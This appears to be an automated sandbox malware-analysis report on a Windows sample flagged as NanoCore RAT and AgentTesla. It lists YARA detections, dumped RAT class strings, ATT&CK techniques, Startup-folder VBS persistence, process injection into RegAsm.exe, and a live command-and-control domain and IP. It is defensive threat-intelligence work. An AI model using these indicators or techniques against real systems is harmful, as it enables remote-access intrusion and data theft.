      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_0026280B cpuid 0_2_0026280B
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\692BB93169319EBA2F556174D781A8636D610A67E6838.exeCode function: 0_2_00262484 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00262484

      Stealing of Sensitive Information

      barindex
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Detected Nanocore Rat
      Source: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe, 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegAsm.exe, 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: ople.exe.exe, 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegAsm.exe, 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Yara detected Nanocore RAT
      Source: Yara matchFile source: 3.2.RegAsm.exe.56a4629.7.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.56a0000.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fdff7c.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fdb146.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.56a0000.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fe45a5.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.ople.exe.exe.2a00000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3ddff7c.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3ddff7c.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3de45a5.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 3.2.RegAsm.exe.3ddb146.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.d80000.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 7.2.ople.exe.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 12.2.RegAsm.exe.3fdff7c.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000C.00000000.296930304.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.513573670.00000000056A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.509119262.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.269192497.0000000000D80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000000.266056234.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.510200651.0000000002D91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.319192237.0000000003F99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.318213068.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.511424469.0000000003DD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000C.00000002.318967216.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000007.00000002.301093367.0000000002A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: 692BB93169319EBA2F556174D781A8636D610A67E6838.exe PID: 5844, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5596, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: ople.exe.exe PID: 1796, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1428, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts111
      Scripting      		2
      Registry Run Keys / Startup Folder      		212
      Process Injection      		11
      Masquerading      		11
      Input Capture      		1
      System Time Discovery      		Remote Services11
      Input Capture      		Exfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/Job1
      DLL Side-Loading      		2
      Registry Run Keys / Startup Folder      		1
      Disable or Modify Tools      		LSASS Memory121
      Security Software Discovery      		Remote Desktop Protocol11
      Archive Collected Data      		Exfiltration Over Bluetooth1
      Remote Access Software      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)212
      Process Injection      		NTDS21
      Virtualization/Sandbox Evasion      		Distributed Component Object ModelInput CaptureScheduled Transfer21
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA Secrets1
      Application Window Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common111
      Scripting      		Cached Domain Credentials1
      File and Directory Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
      Obfuscated Files or Information      		DCSync23
      System Information Discovery      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
      Software Packing      		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
      DLL Side-Loading      		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 629870 Sample: 692BB93169319EBA2F556174D78... Startdate: 19/05/2022 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus / Scanner detection for submitted sample 2->40 42 10 other signatures 2->42 7 692BB93169319EBA2F556174D781A8636D610A67E6838.exe 11 2->7         started        11 wscript.exe 2->11         started        process3 file4 26 C:\Users\user\AppData\...\ople.exe.exe, PE32 7->26 dropped 28 C:\Users\user\AppData\...\ople.exe.vbs, data 7->28 dropped 52 Drops VBS files to the startup folder 7->52 54 Writes to foreign memory regions 7->54 56 Maps a DLL or memory area into another process 7->56 13 RegAsm.exe 6 7->13         started        17 conhost.exe 7->17         started        19 ople.exe.exe 3 11->19         started        signatures5 process6 dnsIp7 32 dinolachy.duckdns.org 192.169.69.25, 49760, 49761, 49762 WOWUS United States 13->32 34 127.0.0.1 unknown unknown 13->34 30 C:\Users\user\AppData\Roaming\...\run.dat, data 13->30 dropped 44 Antivirus detection for dropped file 19->44 46 Multi AV Scanner detection for dropped file 19->46 48 Machine Learning detection for dropped file 19->48 50 2 other signatures 19->50 22 RegAsm.exe 3 19->22         started        24 conhost.exe 19->24         started        file8 signatures9 process10

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      692BB93169319EBA2F556174D781A8636D610A67E6838.exe72%VirustotalBrowse
      692BB93169319EBA2F556174D781A8636D610A67E6838.exe41%MetadefenderBrowse
      692BB93169319EBA2F556174D781A8636D610A67E6838.exe73%ReversingLabsWin32.Trojan.AgentTesla
      692BB93169319EBA2F556174D781A8636D610A67E6838.exe100%AviraHEUR/AGEN.1213119
      692BB93169319EBA2F556174D781A8636D610A67E6838.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Roaming\etwa\ople.exe.exe100%AviraHEUR/AGEN.1213119
      C:\Users\user\AppData\Roaming\etwa\ople.exe.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Roaming\etwa\ople.exe.exe63%ReversingLabsWin32.Trojan.AgentTesla

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      0.2.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.260000.0.unpack100%AviraHEUR/AGEN.1213119Download File
      3.2.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      3.0.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      7.0.ople.exe.exe.ab0000.0.unpack100%AviraHEUR/AGEN.1213119Download File
      3.2.RegAsm.exe.56a0000.6.unpack100%AviraTR/NanoCore.fadteDownload File
      0.0.692BB93169319EBA2F556174D781A8636D610A67E6838.exe.260000.0.unpack100%AviraHEUR/AGEN.1213119Download File
      7.2.ople.exe.exe.ab0000.0.unpack100%AviraHEUR/AGEN.1213119Download File
      12.2.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
      12.0.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

      Domains

      SourceDetectionScannerLabelLink
      dinolachy.duckdns.org1%VirustotalBrowse

      URLs

      SourceDetectionScannerLabelLink
      127.0.0.11%VirustotalBrowse
      127.0.0.10%Avira URL Cloudsafe
      dinolachy.duckdns.org1%VirustotalBrowse
      dinolachy.duckdns.org0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      dinolachy.duckdns.org
      		192.169.69.25
      		truetrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      127.0.0.1true
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      dinolachy.duckdns.orgtrue
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown

      World Map of Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public IPs

      IPDomainCountryFlagASNASN NameMalicious
      192.169.69.25
      		dinolachy.duckdns.orgUnited States
      		23033WOWUStrue

      Private

      IP
      127.0.0.1

      General Information

      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:629870
      Start date and time: 19/05/202205:18:102022-05-19 05:18:10 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 8m 10s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:692BB93169319EBA2F556174D781A8636D610A67E6838.exe
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:30
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winEXE@10/4@12/2
      EGA Information:
      • Successful, ratio: 75%
      HDC Information:
      • Successful, ratio: 87.3% (good quality ratio 79.3%)
      • Quality average: 77.4%
      • Quality standard deviation: 31.9%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 36
      • Number of non-executed functions: 46
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Adjust boot time
      • Enable AMSI

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Execution Graph export aborted for target RegAsm.exe, PID 1428 because it is empty
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtProtectVirtualMemory calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      05:19:25AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ople.exe.vbs
      05:19:40API Interceptor1x Sleep call for process: ople.exe.exe modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
